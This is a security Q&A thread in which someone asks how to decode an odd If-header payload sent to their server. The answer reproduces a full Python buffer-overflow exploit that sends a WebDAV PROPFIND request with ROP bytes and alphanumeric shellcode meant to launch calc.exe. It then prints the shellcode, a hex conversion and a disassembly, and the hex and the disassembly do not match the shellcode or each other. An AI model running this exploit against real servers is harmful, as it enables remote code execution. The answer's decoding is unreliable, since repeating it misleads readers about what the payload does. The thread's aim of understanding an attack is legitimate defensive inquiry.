How do I decode this hacker payload?


A hacker sent this through Apache's $_SERVER["HTTP_IF"]:

http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁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
  1. How can I decode this myself?
  2. What does it say?
  3. Is there an automated tool I can use to detect and automatically decode this kind of thing? (Ideally one I can integrate into PHP 7)
asked by cybernard 19.04.2018 - 15:28

1 answer


I found this document here.

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China 
#-----------Email: [email protected]
import socket
# Python 2 code: str literals are byte strings, so the \x.. escapes below go on the wire as raw UTF-8 bytes
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
# WebDAV PROPFIND request; the overflow is delivered inside an overlong If: header
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='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'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close()

It matches the start of your payload, which is:

http://localhost/aaaaaaa潨硣...

Chinese text to hex:

e6 bd a8 e7 a1 a3

I guess they used this to launch calc.exe.

Maybe you can start from here.

EDIT:

Although I do not have a definitive answer for you, maybe I can be a bit more helpful.

Your shellcode appears to be:

VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLIX1yYpYpipS0ayhe01IBc4dKNrlptKoblL2k1BZtBk3BkxzoFWPJNFLqyomaI0FLml0acLLBLlMPgQHOZmIqWWHbZPObr7dKqBjpdK12MlM1Z0bkOPT8Qu5p0tnj9qz0pPRkNhmHRkOhKpKQVsHcmlMyDKnTRkM1Z601ioMaepvLva8OlMzaY7nXYP1eYdkSSMXxMksMKtT5ZBR8Rkr8Ktyq9Cc64KzlpKTK28mLiqJ3rkM42km1hP3Yq4ldO4QK1KPab9qJr1ioIPNxqOaJRkLRxkTFQMS8RNC5qdm0c81gpiPnPisYK6OdphPLbWlfzgKOj5P1IoaG0Wb7R7PVrHLzNvt9FGYoz5zK30okp1WYPQNqBJYs0QOaQZNpb3NpbHaGSYEOevKOwehkpOb9P1Z21BrH9pP2c0BdNrnraBoaNrb0BHxkr5nNmk9oZ53YwVpjJpQKqX3Pp39pIpBiWp0jJdb02JMO1FOxsENfeNavYoweLqYonwB7aGNwqFQXNMkVMHQkiovuauI045kvpKjoe4Rcm0m0ipJKvqiYETkPipKPk84lyoKOIoLoPibMOqs7C53CnO31qR1SLo14pLnNRP1Xppm0ZKPkNQWPoopPqZyrpjIrb0QZm22Jm227Ox8ZyfWj0Oyovu4S01gPqVh8Jdm3o9gTr44MpLKtlHp1Y0fTM3r0B1b638zrF6dIzBIoGequY0D4nMaHReepD4kf1ZipPT20dMq4LdjlpPb3QXNM1GtnokYofu2cZLlDxkhNOcphVfbvcWQBYoZ5ozYpR72HP1dK2ORgyoj5PjIps8hp85DbaFIo6uJHrp9oIokONcoJNONOr2rERCPyos2L35qbLoloPsT6s3382Opsptlns5qhPeypyXibKNIoYoMa01LqLnOBOCp0lnmbLrp9lnP2nRlvKPAA

This translates to the following in hex:

{ 0x56, 0x56, 0x59, 0x41, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x51, 0x41, 0x54, 0x41, 0x58, 0x41, 0x5A, 0x41, 0x50, 0x41, 0x33, 0x51, 0x41, 0x44, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x52, 0x41, 0x4C, 0x41, 0x59, 0x41, 0x49, 0x41, 0x51, 0x41, 0x49, 0x41, 0x51, 0x41, 0x50, 0x41, 0x35, 0x41, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x31, 0x41, 0x49, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x4A, 0x31, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x58, 0x41, 0x35, 0x38, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x42, 0x51, 0x49, 0x31, 0x41, 0x49, 0x51, 0x49, 0x41, 0x49, 0x51, 0x49, 0x31, 0x31, 0x31, 0x31, 0x41, 0x49, 0x41, 0x4A, 0x51, 0x49, 0x31, 0x41, 0x59, 0x41, 0x5A, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x33, 0x30, 0x41, 0x50, 0x42, 0x39, 0x34, 0x34, 0x4A, 0x42, 0x36, 0x58, 0x36, 0x57, 0x4D, 0x56, 0x37, 0x4F, 0x37, 0x5A, 0x38, 0x5A, 0x38, 0x59, 0x38, 0x59, 0x32, 0x54, 0x4D, 0x54, 0x4A, 0x54, 0x31, 0x4D, 0x30, 0x31, 0x37, 0x59, 0x36, 0x51, 0x30, 0x31, 0x30, 0x31, 0x30, 0x45, 0x4C, 0x53, 0x4B, 0x53, 0x30, 0x45, 0x4C, 0x53, 0x33, 0x53, 0x4A, 0x4D, 0x30, 0x4B, 0x37, 0x54, 0x30, 0x4A, 0x30, 0x36, 0x31, 0x4B, 0x34, 0x4B, 0x36, 0x55, 0x37, 0x57, 0x35, 0x4B, 0x4A, 0x4C, 0x4F, 0x4C, 0x4D, 0x52, 0x35, 0x5A, 0x4E, 0x4C, 0x30, 0x5A, 0x4D, 0x56, 0x35, 0x4C, 0x35, 0x4C, 0x4D, 0x58, 0x31, 0x5A, 0x4C, 0x50, 0x30, 0x56, 0x33, 0x4C, 0x35, 0x4F, 0x35, 0x53, 0x4C, 0x5A, 0x35, 0x59, 0x34, 0x50, 0x4B, 0x54, 0x34, 0x50, 0x34, 0x4F, 0x35, 0x4F, 0x34, 0x55, 0x33, 0x59, 0x4A, 0x4C, 0x37, 0x4E, 0x4C, 0x55, 0x38, 0x50, 0x4D, 0x50, 0x31, 0x51, 0x4D, 0x54, 0x4D, 0x4B, 0x30, 0x35, 0x31, 0x50, 0x31, 0x51, 0x30, 0x46, 0x36, 0x54, 0x30, 0x30, 0x4E, 0x5A, 0x4C, 0x4C, 0x32, 0x4B, 0x35, 0x55, 0x30, 0x4F, 0x30, 0x58, 0x36, 0x50, 0x30, 0x4E, 0x4B, 0x53, 0x30, 0x4C, 0x36, 0x50, 0x36, 0x53, 0x38, 0x53, 0x32, 0x4F, 0x34, 0x51, 0x31, 0x55, 0x31, 0x58, 0x30, 0x36, 0x30, 0x31, 0x33, 0x57, 0x37, 0x4D, 0x30, 0x42, 0x32, 0x58, 0x35, 0x4F, 0x35, 0x52, 0x32, 0x4F, 0x30, 0x32, 0x4C, 0x54, 0x4C, 0x50, 
0x4D, 0x4B, 0x37, 0x55, 0x4B, 0x4C, 0x31, 0x59, 0x39, 0x54, 0x31, 0x5A, 0x37, 0x51, 0x30, 0x46, 0x4C, 0x57, 0x32, 0x52, 0x4B, 0x55, 0x31, 0x50, 0x37, 0x58, 0x4B, 0x51, 0x33, 0x4F, 0x34, 0x53, 0x32, 0x55, 0x4C, 0x52, 0x30, 0x44, 0x4A, 0x4E, 0x35, 0x51, 0x34, 0x57, 0x31, 0x4F, 0x30, 0x48, 0x4D, 0x51, 0x4C, 0x4F, 0x33, 0x54, 0x31, 0x59, 0x39, 0x56, 0x38, 0x56, 0x30, 0x4F, 0x31, 0x55, 0x30, 0x43, 0x35, 0x4C, 0x4B, 0x58, 0x31, 0x59, 0x30, 0x52, 0x32, 0x51, 0x4D, 0x53, 0x34, 0x55, 0x39, 0x4F, 0x32, 0x54, 0x39, 0x54, 0x4D, 0x4C, 0x35, 0x4B, 0x30, 0x52, 0x4D, 0x50, 0x30, 0x45, 0x33, 0x4F, 0x4A, 0x5A, 0x32, 0x51, 0x4D, 0x53, 0x4E, 0x4E, 0x4B, 0x53, 0x31, 0x51, 0x34, 0x4C, 0x34, 0x4F, 0x35, 0x51, 0x39, 0x59, 0x4D, 0x50, 0x39, 0x4B, 0x39, 0x4B, 0x36, 0x53, 0x4E, 0x4E, 0x4C, 0x5A, 0x31, 0x59, 0x38, 0x4E, 0x4D, 0x4C, 0x4D, 0x4C, 0x32, 0x51, 0x38, 0x51, 0x30, 0x30, 0x32, 0x55, 0x31, 0x30, 0x30, 0x5A, 0x39, 0x4F, 0x4B, 0x52, 0x31, 0x4D, 0x33, 0x59, 0x35, 0x54, 0x4A, 0x4D, 0x37, 0x4F, 0x4C, 0x58, 0x38, 0x50, 0x33, 0x55, 0x4C, 0x59, 0x37, 0x59, 0x30, 0x59, 0x37, 0x58, 0x34, 0x59, 0x4D, 0x57, 0x35, 0x4D, 0x4A, 0x55, 0x4C, 0x59, 0x37, 0x52, 0x31, 0x4D, 0x4B, 0x52, 0x4B, 0x51, 0x35, 0x57, 0x30, 0x58, 0x30, 0x4E, 0x33, 0x55, 0x31, 0x4B, 0x4C, 0x50, 0x39, 0x4F, 0x31, 0x50, 0x31, 0x4C, 0x33, 0x57, 0x39, 0x50, 0x35, 0x50, 0x4F, 0x4F, 0x30, 0x46, 0x32, 0x53, 0x4D, 0x58, 0x4A, 0x4E, 0x4A, 0x4D, 0x4A, 0x53, 0x38, 0x4B, 0x4A, 0x4E, 0x4B, 0x50, 0x41 }

If you disassemble it with ndisasm using the -b 32 flag, you get:

00000000  0560560590        add eax,0x90055660
00000005  41                inc ecx
00000006  034034            add eax,[eax+0x34]
00000009  034034            add eax,[eax+0x34]
0000000C  034034            add eax,[eax+0x34]
0000000F  034034            add eax,[eax+0x34]
00000012  034034            add eax,[eax+0x34]
00000015  0510410540        add eax,0x40054110
0000001A  41                inc ecx
0000001B  05804105A0        add eax,0xa0054180
00000020  41                inc ecx
00000021  0500410330        add eax,0x30034100
00000026  51                push ecx
00000027  0410              add al,0x10
00000029  44                inc esp
0000002A  0410              add al,0x10
0000002C  5A                pop edx
0000002D  0410              add al,0x10
0000002F  42                inc edx
00000030  0410              add al,0x10
00000032  52                push edx
00000033  0410              add al,0x10
00000035  4C                dec esp
00000036  0410              add al,0x10
00000038  59                pop ecx
00000039  0410              add al,0x10
0000003B  49                dec ecx
0000003C  0410              add al,0x10
0000003E  51                push ecx
0000003F  0410              add al,0x10
00000041  49                dec ecx
00000042  0410              add al,0x10
00000044  51                push ecx
00000045  0410              add al,0x10
00000047  50                push eax
00000048  0410              add al,0x10
0000004A  3504104104        xor eax,0x4411004
0000004F  105004            adc [eax+0x4],dl
00000052  105A03            adc [edx+0x3],bl
00000055  104104            adc [ecx+0x4],al
00000058  90                nop
00000059  310410            xor [eax+edx],eax
0000005C  49                dec ecx
0000005D  0410              add al,0x10
0000005F  49                dec ecx
00000060  0410              add al,0x10
00000062  4A                dec edx
00000063  0310              add edx,[eax]
00000065  310410            xor [eax+edx],eax
00000068  49                dec ecx
00000069  0410              add al,0x10
0000006B  49                dec ecx
0000006C  0410              add al,0x10
0000006E  58                pop eax
0000006F  0410              add al,0x10
00000071  3503804104        xor eax,0x4418003
00000076  105004            adc [eax+0x4],dl
00000079  105A04            adc [edx+0x4],bl
0000007C  104204            adc [edx+0x4],al
0000007F  104205            adc [edx+0x5],al
00000082  104903            adc [ecx+0x3],cl
00000085  104104            adc [ecx+0x4],al
00000088  90                nop
00000089  51                push ecx
0000008A  0490              add al,0x90
0000008C  41                inc ecx
0000008D  0490              add al,0x90
0000008F  51                push ecx
00000090  0490              add al,0x90
00000092  3103              xor [ebx],eax
00000094  1031              adc [ecx],dh
00000096  0310              add edx,[eax]
00000098  41                inc ecx
00000099  0490              add al,0x90
0000009B  41                inc ecx
0000009C  04A0              add al,0xa0
0000009E  51                push ecx
0000009F  0490              add al,0x90
000000A1  310410            xor [eax+edx],eax
000000A4  59                pop ecx
000000A5  0410              add al,0x10
000000A7  5A                pop edx
000000A8  0420              add al,0x20
000000AA  41                inc ecx
000000AB  0420              add al,0x20
000000AD  41                inc ecx
000000AE  0420              add al,0x20
000000B0  41                inc ecx
000000B1  0420              add al,0x20
000000B3  41                inc ecx
000000B4  0420              add al,0x20
000000B6  3303              xor eax,[ebx]
000000B8  004105            add [ecx+0x5],al
000000BB  004203            add [edx+0x3],al
000000BE  90                nop
000000BF  3403              xor al,0x3
000000C1  40                inc eax
000000C2  4A                dec edx
000000C3  0420              add al,0x20
000000C5  360580360570      ss add eax,0x70053680
000000CB  4D                dec ebp
000000CC  05603704F0        add eax,0xf0043760
000000D1  37                aaa
000000D2  05A03805A0        add eax,0xa00538a0
000000D7  380590380590      cmp [dword 0x90053890],al
000000DD  3205404D0540      xor al,[dword 0x40054d40]
000000E3  4A                dec edx
000000E4  05403104D0        add eax,0xd0043140
000000E9  3003              xor [ebx],al
000000EB  1037              adc [edi],dh
000000ED  0590360510        add eax,0x10053690
000000F2  3003              xor [ebx],al
000000F4  1030              adc [eax],dh
000000F6  0310              add edx,[eax]
000000F8  300450            xor [eax+edx*2],al
000000FB  4C                dec esp
000000FC  05304B0530        add eax,0x30054b30
00000101  300450            xor [eax+edx*2],al
00000104  4C                dec esp
00000105  0530330530        add eax,0x30053330
0000010A  4A                dec edx
0000010B  04D0              add al,0xd0
0000010D  3004B0            xor [eax+esi*4],al
00000110  37                aaa
00000111  05403004A0        add eax,0xa0043040
00000116  3003              xor [ebx],al
00000118  60                pusha
00000119  3104B0            xor [eax+esi*4],eax
0000011C  3404              xor al,0x4
0000011E  B036              mov al,0x36
00000120  0550370570        add eax,0x70053750
00000125  3504B04A04        xor eax,0x44ab004
0000012A  C04F04C0          ror byte [edi+0x4],byte 0xc0
0000012E  4D                dec ebp
0000012F  05203505A0        add eax,0xa0053520
00000134  4E                dec esi
00000135  04C0              add al,0xc0
00000137  3005A04D0560      xor [dword 0x60054da0],al
0000013D  3504C03504        xor eax,0x435c004
00000142  C04D0580          ror byte [ebp+0x5],byte 0x80
00000146  3105A04C0500      xor [dword 0x54ca0],eax
0000014C  3005603304C0      xor [dword 0xc0043360],al
00000152  3504F03505        xor eax,0x535f004
00000157  304C05A0          xor [ebp+eax-0x60],cl
0000015B  3505903405        xor eax,0x5349005
00000160  004B05            add [ebx+0x5],cl
00000163  40                inc eax
00000164  3405              xor al,0x5
00000166  003404            add [esp+eax],dh
00000169  F03504F03405      lock xor eax,0x534f004
0000016F  50                push eax
00000170  3305904A04C0      xor eax,[dword 0xc0044a90]
00000176  37                aaa
00000177  04E0              add al,0xe0
00000179  4C                dec esp
0000017A  0550380500        add eax,0x53850
0000017F  4D                dec ebp
00000180  0500310510        add eax,0x10053100
00000185  4D                dec ebp
00000186  05404D04B0        add eax,0xb0044d40
0000018B  3003              xor [ebx],al
0000018D  50                push eax
0000018E  310500310510      xor [dword 0x10053100],eax
00000194  300460            xor [eax],al
00000197  360540300300      ss add eax,0x33040
0000019D  4E                dec esi
0000019E  05A04C04C0        add eax,0xc0044ca0
000001A3  3204B0            xor al,[eax+esi*4]
000001A6  3505503004        xor eax,0x4305005
000001AB  F0300580360500    lock xor [dword 0x53680],al
000001B2  3004E0            xor [eax],al
000001B5  4B                dec ebx
000001B6  05303004C0        add eax,0xc0043030
000001BB  360500360530      ss add eax,0x30053600
000001C1  3805303204F0      cmp [dword 0xf0043230],al
000001C7  3405              xor al,0x5
000001C9  1031              adc [ecx],dh
000001CB  0550310580        add eax,0x80053150
000001D0  3003              xor [ebx],al
000001D2  60                pusha
000001D3  3003              xor [ebx],al
000001D5  1033              adc [ebx],dh
000001D7  05703704D0        add eax,0xd0043770
000001DC  300420            xor [eax],al
000001DF  3205803504F0      xor al,[dword 0xf0043580]
000001E5  3505203204        xor eax,0x4322005
000001EA  F03003            lock xor [ebx],al
000001ED  204C0540          and [ebp+eax+0x40],cl
000001F1  4C                dec esp
000001F2  05004D04B0        add eax,0xb0044d00
000001F7  37                aaa
000001F8  05504B04C0        add eax,0xc0044b50
000001FD  310590390540      xor [dword 0x40053990],eax
00000203  3105A0370510      xor [dword 0x100537a0],eax
00000209  300460            xor [eax],al
0000020C  4C                dec esp
0000020D  0570320520        add eax,0x20053270
00000212  4B                dec ebx
00000213  0550310500        add eax,0x53150
00000218  37                aaa
00000219  05804B0510        add eax,0x10054b80
0000021E  3304F0            xor eax,[eax+esi*8]
00000221  3405              xor al,0x5
00000223  3032              xor [edx],dh
00000225  05504C0520        add eax,0x20054c50
0000022A  300440            xor [eax+eax*2],al
0000022D  4A                dec edx
0000022E  04E0              add al,0xe0
00000230  3505103405        xor eax,0x5341005
00000235  7031              jo 0x268
00000237  04F0              add al,0xf0
00000239  300480            xor [eax+eax*4],al
0000023C  4D                dec ebp
0000023D  05104C04F0        add eax,0xf0044c10
00000242  330540310590      xor eax,[dword 0x90053140]
00000248  390560380560      cmp [dword 0x60053860],eax
0000024E  3004F0            xor [eax+esi*8],al
00000251  310550300430      xor [dword 0x30043050],eax
00000257  3504C04B05        xor eax,0x54bc004
0000025C  803105            xor byte [ecx],0x5
0000025F  90                nop
00000260  300520320510      xor [dword 0x10053220],al
00000266  4D                dec ebp
00000267  0530340550        add eax,0x50053430
0000026C  3904F0            cmp [eax+esi*8],eax
0000026F  320540390540      xor al,[dword 0x40053940]
00000275  4D                dec ebp
00000276  04C0              add al,0xc0
00000278  3504B03005        xor eax,0x530b004
0000027D  204D05            and [ebp+0x5],cl
00000280  0030              add [eax],dh
00000282  0450              add al,0x50
00000284  3304F0            xor eax,[eax+esi*8]
00000287  4A                dec edx
00000288  05A0320510        add eax,0x100532a0
0000028D  4D                dec ebp
0000028E  05304E04E0        add eax,0xe0044e30
00000293  4B                dec ebx
00000294  0530310510        add eax,0x10053130
00000299  3404              xor al,0x4
0000029B  C0                db 0xc0
0000029C  3404              xor al,0x4
0000029E  F03505103905      lock xor eax,0x5391005
000002A4  90                nop
000002A5  4D                dec ebp
000002A6  05003904B0        add eax,0xb0043900
000002AB  3904B0            cmp [eax+esi*4],eax
000002AE  3605304E04E0      ss add eax,0xe0044e30
000002B4  4C                dec esp
000002B5  05A0310590        add eax,0x900531a0
000002BA  3804E0            cmp [eax],al
000002BD  4D                dec ebp
000002BE  04C0              add al,0xc0
000002C0  4D                dec ebp
000002C1  04C0              add al,0xc0
000002C3  320510380510      xor al,[dword 0x10053810]
000002C9  3003              xor [ebx],al
000002CB  0032              add [edx],dh
000002CD  0550310300        add eax,0x33150
000002D2  3005A03904F0      xor [dword 0xf00439a0],al
000002D8  4B                dec ebx
000002D9  05203104D0        add eax,0xd0043120
000002DE  330590350540      xor eax,[dword 0x40053590]
000002E4  4A                dec edx
000002E5  04D0              add al,0xd0
000002E7  37                aaa
000002E8  04F0              add al,0xf0
000002EA  4C                dec esp
000002EB  0580380500        add eax,0x53880
000002F0  3305504C0590      xor eax,[dword 0x90054c50]
000002F6  37                aaa
000002F7  0590300590        add eax,0x90053090
000002FC  37                aaa
000002FD  0580340590        add eax,0x90053480
00000302  4D                dec ebp
00000303  05703504D0        add eax,0xd0043570
00000308  4A                dec edx
00000309  05504C0590        add eax,0x90054c50
0000030E  37                aaa
0000030F  05203104D0        add eax,0xd0043120
00000314  4B                dec ebx
00000315  05204B0510        add eax,0x10054b20
0000031A  3505703005        xor eax,0x5307005
0000031F  803004            xor byte [eax],0x4
00000322  E033              loopne 0x357
00000324  05503104B0        add eax,0xb0043150
00000329  4C                dec esp
0000032A  05003904F0        add eax,0xf0043900
0000032F  3105003104C0      xor [dword 0xc0043100],eax
00000335  330570390500      xor eax,[dword 0x53970]
0000033B  3505004F04        xor eax,0x44f0005
00000340  F0300460          lock xor [eax],al
00000344  3205304D0580      xor al,[dword 0x80054d30]
0000034A  4A                dec edx
0000034B  04E0              add al,0xe0
0000034D  4A                dec edx
0000034E  04D0              add al,0xd0
00000350  4A                dec edx
00000351  05303804B0        add eax,0xb0043830
00000356  4A                dec edx
00000357  04E0              add al,0xe0
00000359  4B                dec ebx
0000035A  05                db 0x05
0000035B  00                db 0x00
0000035C  41                inc ecx

I also checked the -b 64 disassembly, but it looked like nonsense to me. Correct me if I'm wrong here. Maybe you can figure something out from here?

For reference, the calc.exe buffer-overflow shellcode can be found here:

link

You can also search that website for partial matches of the shellcode you have.

Also here, you can check just the shellcodes:

link

answered by Maximus 19.04.2018 - 16:08
